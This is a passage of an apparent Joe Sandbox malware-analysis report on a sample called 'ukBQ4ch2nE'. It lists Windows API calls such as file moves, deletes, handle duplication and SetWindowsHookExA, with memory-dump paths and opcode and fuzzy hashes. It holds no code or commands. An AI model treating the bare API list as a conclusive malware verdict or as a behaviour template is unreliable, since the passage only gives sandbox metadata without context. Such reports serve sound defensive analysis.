                                                        • Instruction Fuzzy Hash: 033100B4D01248DFDB24CF99C984BCDBBF5BF48314F24841AE404AB290C7756845CF91
                                                        APIs
                                                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00B986D0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: FileMove
                                                        • String ID:
                                                        • API String ID: 3562171763-0
                                                        • Opcode ID: a58605cbad6212a6f09cffe6befeb8cc435804b1c3b01ed398d71c24f909fcad
                                                        • Instruction ID: 4de5d5680aeef0e71d6f1eb95ff12d9932251dd21687eb19e4726a37b015a599
                                                        • Opcode Fuzzy Hash: a58605cbad6212a6f09cffe6befeb8cc435804b1c3b01ed398d71c24f909fcad
                                                        • Instruction Fuzzy Hash: 0E2127B6C002089FCF50CF99D884ADEFBF5FB89310F24816AE818AB201C7759904CBA4
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065E711F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 4487261a7d37c52645a1508d8bf408b73128047c8681a581da6a24a52aa838e7
                                                        • Instruction ID: 84b4f344be6c934e713843cfe917c969cd8e2864c6cdd3ef076790299af388c9
                                                        • Opcode Fuzzy Hash: 4487261a7d37c52645a1508d8bf408b73128047c8681a581da6a24a52aa838e7
                                                        • Instruction Fuzzy Hash: 1B21F6B5D00249AFDB10CFA9D884ADEFBF4FB48310F14801AE918A7210D374A944CFA5
                                                        APIs
                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 065EA943
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: 1391f48f9b93e1c3f03ac8651976996f5d4283439116ab82b728c11811162899
                                                        • Instruction ID: da2f2fc198f8902ea074f5ee77006fc100b96ec3f6fb918c7d552c554f3aa9b9
                                                        • Opcode Fuzzy Hash: 1391f48f9b93e1c3f03ac8651976996f5d4283439116ab82b728c11811162899
                                                        • Instruction Fuzzy Hash: 2C2135B5D002499FCB54CFAAC944BEEFBF9FB88320F14841AE458A7250C775A940CFA1
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 065E711F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 67ccf7cf944ac1f37775a173bf21338284502152f4500143ad1fc44cc75c4247
                                                        • Instruction ID: 32285f86cd83ec5af007bc7654b398b8f6c4c823a2a17bb562c5ce04ea04f2c7
                                                        • Opcode Fuzzy Hash: 67ccf7cf944ac1f37775a173bf21338284502152f4500143ad1fc44cc75c4247
                                                        • Instruction Fuzzy Hash: 9321C6B5D002499FDB10CFAAD984ADEFBF8FB48320F14841AE914A7350D375A944DFA5
                                                        APIs
                                                        • MoveFileA.KERNEL32(?,00000000,?,?), ref: 00B986D0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: FileMove
                                                        • String ID:
                                                        • API String ID: 3562171763-0
                                                        • Opcode ID: 61bed89c3f4b97dc92c8beed147f5ac3c89361879efd883e1879b8f41c708ca3
                                                        • Instruction ID: 8b909af1ba37a28ed182d4d20f6dd0e33cbcd7d39401e1f282e666ae951f2474
                                                        • Opcode Fuzzy Hash: 61bed89c3f4b97dc92c8beed147f5ac3c89361879efd883e1879b8f41c708ca3
                                                        • Instruction Fuzzy Hash: 8A2123B6C002489FCF10CF99D980ADEFBF1FF88320F24856AE818AB205C7355900CBA0
                                                        APIs
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00B980D8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: 434587f029341bcecc4d0dac05d09604bce9f28512fdb267e06e6c0f645353c9
                                                        • Instruction ID: 944bb094ec8353f4e6fee130ad478e993a1c35462dfd3e11c75da34f02c7f17a
                                                        • Opcode Fuzzy Hash: 434587f029341bcecc4d0dac05d09604bce9f28512fdb267e06e6c0f645353c9
                                                        • Instruction Fuzzy Hash: 1E2115B5C006598BCB10CF99C545BAEFBF4EF48320F14856AD818A7241D778A945CFA1
                                                        APIs
                                                        • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 065EA943
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: 8a5aed45611f438229075c27d3e4001750bd1fcb087475a6af6365adbd45672d
                                                        • Instruction ID: c0fc9039d864fc43d5c188bbcb62cbe848e52669fe60fe15bbe50986fc19ab69
                                                        • Opcode Fuzzy Hash: 8a5aed45611f438229075c27d3e4001750bd1fcb087475a6af6365adbd45672d
                                                        • Instruction Fuzzy Hash: B02113B5D002498FCB54CFAAC944BEEFBF5FB88320F14842AE458A7250C775A944CFA1
                                                        APIs
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00B980D8
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: d1e420ff0ad034ed2e00fb97a0d114ffb43314cc5936de4e242b9cb2366e1ee5
                                                        • Instruction ID: bf1a16b3de94fc5abbe51cd41ef05b8c99018b5272f800d5feeba5179ffa0983
                                                        • Opcode Fuzzy Hash: d1e420ff0ad034ed2e00fb97a0d114ffb43314cc5936de4e242b9cb2366e1ee5
                                                        • Instruction Fuzzy Hash: D61106B1C006599BCB14CF9AC544B9EFBF4FF48320F15816AD818A7240D779A944CFA5
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 065E2416
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: c7b5e764751fc3de78a9171d630c247b606c95a4d1e5e71090be0a64619cbe4e
                                                        • Instruction ID: 266aa885e4a71048c557f95c01ac25ead14e9e97746c3a68953e4fad874a26cf
                                                        • Opcode Fuzzy Hash: c7b5e764751fc3de78a9171d630c247b606c95a4d1e5e71090be0a64619cbe4e
                                                        • Instruction Fuzzy Hash: E51123B5C002488BCB24CF9AD844ADEFBF8EB88320F14841AE818A7600C375A544CFA1
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00B9F7DF
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4034514264.0000000000B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_b90000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: f1be5dede42517e81e30f74331d651c720d735a361e81045113ecbdaf06240e8
                                                        • Instruction ID: 9fc11ae696d9609df3727ece8ef2df144c3097fc8f61ae06d9269024737910f8
                                                        • Opcode Fuzzy Hash: f1be5dede42517e81e30f74331d651c720d735a361e81045113ecbdaf06240e8
                                                        • Instruction Fuzzy Hash: E911F6B1C0065A9BDB10CF9AC544BDEFBF4EF48320F15816AD818A7240D778A944CFA5
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 065E2416
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 6c088702bda8d7660aa9ceca8c60c8512773c2a08b1ce690530bc39e112b3eaf
                                                        • Instruction ID: 9f1d5284e0240df8d8a1455be07f45d3ae4e36899ebb0faf279c8654b5661cfa
                                                        • Opcode Fuzzy Hash: 6c088702bda8d7660aa9ceca8c60c8512773c2a08b1ce690530bc39e112b3eaf
                                                        • Instruction Fuzzy Hash: 5D11F3B5C007498FDB24CF9AC444ADEFBF8EB88220F14845AD919B7210C375A545CFA5
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 065E8B85
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: 4e2f237b446d05319bc4bbed1d3055990a8cf9c479f738c0426b69c54c2ae53b
                                                        • Instruction ID: 12ba0900cf3091e707b7ad968e542e040bb36f03d556b92288496b968834206e
                                                        • Opcode Fuzzy Hash: 4e2f237b446d05319bc4bbed1d3055990a8cf9c479f738c0426b69c54c2ae53b
                                                        • Instruction Fuzzy Hash: 5711FEB58002888FDB20CFAAD845BDEFFF8EB48324F248459E518A7600C379A544CFA5
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,065E823D), ref: 065E82C7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 0d811124a035bd82da95f0545d6b2151b07bd2d13fb5af16b335666e72ba0e89
                                                        • Instruction ID: 300c3e90a9db709db876eb01e97a4e689d88d4f2a5482bdceabeff8a931e1acd
                                                        • Opcode Fuzzy Hash: 0d811124a035bd82da95f0545d6b2151b07bd2d13fb5af16b335666e72ba0e89
                                                        • Instruction Fuzzy Hash: C51103B5800648CFCB20CF9AD844BDEFFF8EB48320F24845AE518A7640C779A544CFA5
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 065E8B85
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: b162d7657b7fd46b6282447912e11c2a3a1c274f460b59e4251e52f8c2b7a756
                                                        • Instruction ID: e2a56706f60a1e942eec6b93ab6f28a0da15ef9c5292564604c45e781db238c4
                                                        • Opcode Fuzzy Hash: b162d7657b7fd46b6282447912e11c2a3a1c274f460b59e4251e52f8c2b7a756
                                                        • Instruction Fuzzy Hash: D21100B5C003488FDB60DF9AC444B9EBBF8EB48324F24845AE518A7200C379A944CFA5
                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,065E823D), ref: 065E82C7
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4048935414.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_65e0000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 73d0041cc36b408b11e833bf12175e28498848c447a295ed5f1467aa799a590d
                                                        • Instruction ID: 6b4a56fe1cf899fa9ef61d1f1e8b2a154c91759b7ba62ce8412a904000118f20
                                                        • Opcode Fuzzy Hash: 73d0041cc36b408b11e833bf12175e28498848c447a295ed5f1467aa799a590d
                                                        • Instruction Fuzzy Hash: A31103B5800648CFCB24DF9AD844BDEFBF8EB58320F24845AE918A7240C775A944CFA5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: b2913526c360ce07c52a49092440e2534e56dcacb9353714d8bc047f6cf646ec
                                                        • Instruction ID: 28f02c69097491a8d2b0854178a4ab34d6a29bc3a4afa09d19eb2ae52c2cd49a
                                                        • Opcode Fuzzy Hash: b2913526c360ce07c52a49092440e2534e56dcacb9353714d8bc047f6cf646ec
                                                        • Instruction Fuzzy Hash: D741ACB0E106199FDF55DFA5D8857AEBBB6EF85300F244929E402EB350EB709842CB81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: 4823d0207855375591346ad15c4f4145360fb2a086647735317bcaff86c54c45
                                                        • Instruction ID: 38a0512eb7c04c6cc8e8472e76514d5d8300dac2fa1d9c3939d22c846b836016
                                                        • Opcode Fuzzy Hash: 4823d0207855375591346ad15c4f4145360fb2a086647735317bcaff86c54c45
                                                        • Instruction Fuzzy Hash: D931F230B002158FDB49AB74DA6476F7BE6AF89710F244468D406DB395EF35CE42CB94
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: 24df85818a005c4083b9319acc1a85e92bce80716fd75c50fadaf57209b4ab80
                                                        • Instruction ID: db53663fad57f73da8bdd015e4cd916ad6d4cace6840be99427cc0cee1bfbe2e
                                                        • Opcode Fuzzy Hash: 24df85818a005c4083b9319acc1a85e92bce80716fd75c50fadaf57209b4ab80
                                                        • Instruction Fuzzy Hash: 4A31CD30B102158FDB49AB74DA6476F7BEAAF89700F244468D406DB3A4EE35DE42CBD1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: |
                                                        • API String ID: 0-2343686810
                                                        • Opcode ID: d909f13ddd0da0bd06627f6f4690af23230009931b351f7701e8c5332f027fea
                                                        • Instruction ID: a7148f72762d376011387ad5e2ce09a4e3e2015c94a5894705227eac1d46f7ae
                                                        • Opcode Fuzzy Hash: d909f13ddd0da0bd06627f6f4690af23230009931b351f7701e8c5332f027fea
                                                        • Instruction Fuzzy Hash: 28115B70F50224DFDB44EB789905B6E7BF5AF4C700F108469E91AEB3A0EB359D018B84
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: |
                                                        • API String ID: 0-2343686810
                                                        • Opcode ID: 544ca3afdea569abe8e8769c0718dab431fb7ace0723965c3b72c853c4bb3284
                                                        • Instruction ID: 57e7f9cf275320961f1b4fa15fd485053969a76946729745eff1d247539e1cf5
                                                        • Opcode Fuzzy Hash: 544ca3afdea569abe8e8769c0718dab431fb7ace0723965c3b72c853c4bb3284
                                                        • Instruction Fuzzy Hash: 25115B75F50220DFDB44EB78990576E7BF1AF4C700F104469E90AE73A4EB359D018B84
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 967d70bb155a7ba2eca21cd00017a98febe864a32ecd80ee290ccc1a07940c7f
                                                        • Instruction ID: 5d0bab1e956649b87dce3221feb8dc4dfff731eec74c67bc978c5e069babffd4
                                                        • Opcode Fuzzy Hash: 967d70bb155a7ba2eca21cd00017a98febe864a32ecd80ee290ccc1a07940c7f
                                                        • Instruction Fuzzy Hash: A7924434E002148FDB60DB68C594A5DBBF2FF49314F5484AAE44AEB365DB35ED86CB80
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d73f92f7d494fba7bb9dc1f84bea83d2c2facfcdca1606614a4f77e0161fd05
                                                        • Instruction ID: 3d1086c1f79deaa6142b602bf44e1b637a49ffa32e853693920549624327231d
                                                        • Opcode Fuzzy Hash: 0d73f92f7d494fba7bb9dc1f84bea83d2c2facfcdca1606614a4f77e0161fd05
                                                        • Instruction Fuzzy Hash: E861A171F001214FDB559A7EDC8066FBAD7AFC4610B254439E80EDB364EE69DD0287D1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a5afb47afad382e296707f91c2fd915d999d60e8a9acf9a772aa5a137470314
                                                        • Instruction ID: a1b908cda170ab2ae379c7925c98124d8799516c42d8bf7b528199d74014d335
                                                        • Opcode Fuzzy Hash: 2a5afb47afad382e296707f91c2fd915d999d60e8a9acf9a772aa5a137470314
                                                        • Instruction Fuzzy Hash: E9812D34B106198FDB54DFB9D59466EB7F2AF89300F108529E40AEB398EF74DC428B81
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 37785e095bfb0cde4b3b987a4a899a30b85b629f6086fc4a176b0e6a3b8af92e
                                                        • Instruction ID: f35d337189db4acfb40a28018bdc84ad005b74715df818a8231e7355ef6cd449
                                                        • Opcode Fuzzy Hash: 37785e095bfb0cde4b3b987a4a899a30b85b629f6086fc4a176b0e6a3b8af92e
                                                        • Instruction Fuzzy Hash: 16914C74E102198BDF60DF68C890B9DB7B1FF89300F2085A9D549FB395EB70AA85CB51
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfdd02f44294fa72fbba40c2e798dedfe74513e311c6ce99851947edf7815eea
                                                        • Instruction ID: 07fced5ea45a125e3bb3682fd5bd8775d5e6d60af4fdc68cd00063a402af5f58
                                                        • Opcode Fuzzy Hash: dfdd02f44294fa72fbba40c2e798dedfe74513e311c6ce99851947edf7815eea
                                                        • Instruction Fuzzy Hash: 0D911C74E106198BDF60DF68C880B9DB7B1FF89310F208595D549BB395EB70AA85CF90
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8bfc04bfdbba573ba912fd3bcd6d12a058ec30e44f3ab7177331013a53d69493
                                                        • Instruction ID: dc26e282495c90813d32457d6e4b8e0f83827bba6dd6cc1f365579ba04b1ddff
                                                        • Opcode Fuzzy Hash: 8bfc04bfdbba573ba912fd3bcd6d12a058ec30e44f3ab7177331013a53d69493
                                                        • Instruction Fuzzy Hash: 5C713E74A002198FCB54DFA9D994A9EBBF6FF88300F24846AE405EB355DB31ED46CB50
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16bcaa0f3765ccff45aa52b07380aaad59ecdd8a8b783dbb73266ac48ff1870c
                                                        • Instruction ID: 9ce0d004205dfc4a998b6ec838785208c10b1e9cf40b287f4a6684be438669a0
                                                        • Opcode Fuzzy Hash: 16bcaa0f3765ccff45aa52b07380aaad59ecdd8a8b783dbb73266ac48ff1870c
                                                        • Instruction Fuzzy Hash: 20714D70A002199FCB54DFA9D990A9EBBF6FF88300F24846AE405EB355DB31ED46CB50
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6702eed3373af4aebf868bc6ef98e1fa7bd830dbed3085348b7bfd4183122e03
                                                        • Instruction ID: 0be2971baf86da11e64351f42afcb1a84e346a15406a65e57485ce370ef09ede
                                                        • Opcode Fuzzy Hash: 6702eed3373af4aebf868bc6ef98e1fa7bd830dbed3085348b7bfd4183122e03
                                                        • Instruction Fuzzy Hash: 7451D031E10219DFDF54AF78E8946ADBBB2FF88315F10886AE106DB390DB358855CB81
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39bf87567c58cb90d93d11a386909bf5490147ac159bcd9f2298e1f7127e157c
                                                        • Instruction ID: e382f4e64e46891ffde1ed8052ee8f0aea6ba42ffae53abba5df7cbeab09bf86
                                                        • Opcode Fuzzy Hash: 39bf87567c58cb90d93d11a386909bf5490147ac159bcd9f2298e1f7127e157c
                                                        • Instruction Fuzzy Hash: 3A51D870F301248BEFA0667DE99476F369AD789310F20442AE60ACB3A9DF78DC414792
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 81e69f6b9b3ae6c6fb8f66d7ea2aefb499165e7ef43cc874bcb820d31bbebf29
                                                        • Instruction ID: 81b385e5acdf049299e5895f634c3bc7a96676feca98f39315c2ed8f767ad2fa
                                                        • Opcode Fuzzy Hash: 81e69f6b9b3ae6c6fb8f66d7ea2aefb499165e7ef43cc874bcb820d31bbebf29
                                                        • Instruction Fuzzy Hash: 2051D970F301248BEFA0667DD99476F26AAD789310F20443AE60ACB3E9DF78DC414792
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ba34a993b0cbb933a043da406c17a277e46f2af2db00d1718d3f6cfc16f5ee3
                                                        • Instruction ID: 4cb8f6118ecfff5f07c35a9655c24bd5dcb026d66291e2be07d0ea7ffc813817
                                                        • Opcode Fuzzy Hash: 1ba34a993b0cbb933a043da406c17a277e46f2af2db00d1718d3f6cfc16f5ee3
                                                        • Instruction Fuzzy Hash: A0518274E002258FEF718AA9C58077EBBB2FB45310F24882AE45BDB385D675DD41CB91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24df2cb1eded8d931341d657c19de0e516456e629dee7a9000050bfbf68220ff
                                                        • Instruction ID: 2bfbbf5168605e5e13b381753aed9cc70b94273ec299011d8c787bf3e02201bd
                                                        • Opcode Fuzzy Hash: 24df2cb1eded8d931341d657c19de0e516456e629dee7a9000050bfbf68220ff
                                                        • Instruction Fuzzy Hash: 6B416D71E0071A9FDF70CEA9D880AAFFBB1FB85310F10492AE156D7650D331A9558BD1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4049467594.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6630000_ukBQ4ch2nE.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5abc45b0e61ecbea6cf4f737233ca25fca10c584c10da5d510993e3e8ef6ac38
                                                        • Instruction ID: bd4def1adb4bc48613ff829a117c8f854f9118dc954c624a304c6447244f171f
                                                        • Opcode Fuzzy Hash: 5abc45b0e61ecbea6cf4f737233ca25fca10c584c10da5d510993e3e8ef6ac38
